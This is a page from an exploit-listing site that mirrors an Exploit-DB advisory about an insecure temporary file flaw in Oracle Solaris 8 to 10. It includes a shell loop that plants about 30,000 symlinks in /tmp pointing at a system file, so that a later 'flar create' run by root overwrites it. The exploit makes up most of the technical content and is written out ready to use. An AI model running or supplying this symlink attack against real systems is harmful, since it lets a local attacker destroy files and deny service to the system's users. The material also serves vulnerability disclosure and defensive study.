Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Insecure Temporary File Creation in Oracle Solaris - exploit.company
header-logo
Suggest Exploit
vendor:
Oracle Solaris
by:
Unknown
N/A
CVSS
N/A
Insecure Temporary File Creation
377
CWE
Product Name: Oracle Solaris
Affected Version From: Oracle Solaris 8
Affected Version To: Oracle Solaris 10
Patch Exists: NO
Related CWE: Unknown
CPE: solaris
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Insecure Temporary File Creation in Oracle Solaris

A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41619/info

Oracle Solaris is prone to an insecure temporary file creation vulnerability.

A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.

Oracle Solaris 8, 9 and 10 are vulnerable. 


   $ x=0
   $ while [ "$x" -le 30000 ];do
   > ln -s /etc/important /tmp/.flash_filter_one_.$x
   > x=$(expr "$x" + 1)
   > done

Later, when root creates a flash archive with:

   # flar create -n junk `pwd`/junk.flar